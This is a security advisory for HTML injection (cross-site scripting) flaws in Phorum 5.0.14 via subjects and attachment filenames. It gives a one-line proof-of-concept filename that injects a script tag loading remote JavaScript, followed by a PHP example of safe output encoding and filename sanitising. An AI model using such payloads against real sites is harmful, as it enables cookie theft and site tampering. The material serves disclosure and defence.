Phorum Multiple Subject and Attachment HTML Injection Vulnerabilities
BID:12800
Info
| Bugtraq ID: | 12800 |
| Class: | Input Validation Error |
| CVE: | CVE-2005-0784 CVE-2005-0783 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 14 2005 12:00AM |
| Updated: | Jul 12 2009 10:56AM |
| Credit: | Discovery of this vulnerability is credited to Jon Oberheide <[email protected]>. |
| Vulnerable: | Phorum Phorum 5.0.14 |
| Not Vulnerable: | |
Discussion
Phorum is reportedly affected by multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.
The attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.
These issues are reported to affect Phorum 5.0.14; earlier versions may also be affected.
Exploit / POC
No exploit is required.
The following proof of concept demonstrates a filename suitable for an attachment:
test<script language='Javascript' src='http:&#47;&#47;www.example.com&#47;test.js'>.txt
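The following is an added example, not Phorum's code and not part of the original advisory: it shows the unencoded rendering pattern this class of bug comes from next to output encoding and upload-time filename normalization, using the proof-of-concept filename above as constructed input. The function names and the download.php URL are hypothetical.

```php
<?php
// Added example; all function names and the download.php URL are hypothetical.

// Constructed sample input: the proof-of-concept filename from this advisory.
$filename = "test<script language='Javascript' src='http:&#47;&#47;www.example.com&#47;test.js'>.txt";

// Vulnerable pattern: user-supplied text is concatenated into markup as-is,
// so the browser parses the <script> tag and decodes &#47; to "/" in src.
function render_attachment_unsafe(string $name): string
{
    return '<a href="download.php?file=1">' . $name . '</a>';
}

// Output encoding. ENT_QUOTES encodes both quote styles, so the value is
// safe in element content and in quoted attributes. With the default
// double_encode=true, "&#47;" becomes "&amp;#47;" and is displayed literally.
function h(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened rendering: every user-controlled value passes through h().
function render_attachment_safe(string $name): string
{
    return '<a href="download.php?file=1" title="' . h($name) . '">'
         . h($name) . '</a>';
}

// Defence in depth at upload time: keep only a conservative character set
// in the stored name. This complements output encoding, it does not replace it.
function normalize_upload_name(string $name): string
{
    $name = basename(str_replace('\\', '/', $name));        // drop any path part
    $name = preg_replace('/[^A-Za-z0-9._-]+/', '_', $name); // allow-list characters
    $name = trim($name, '._');                              // no leading dot or underscore
    return $name === '' ? 'attachment' : substr($name, 0, 100);
}

echo render_attachment_unsafe($filename), "\n";
echo render_attachment_safe($filename), "\n";
echo normalize_upload_name($filename), "\n";
```

The same h() call applies to message subjects, the other injection point named in the title.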
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
References:
- Phorum Homepage (Phorum)
- [Full-disclosure] 3 XSS Vulnerabilities in Phorum <= 5.0.14 (Jon Oberheide)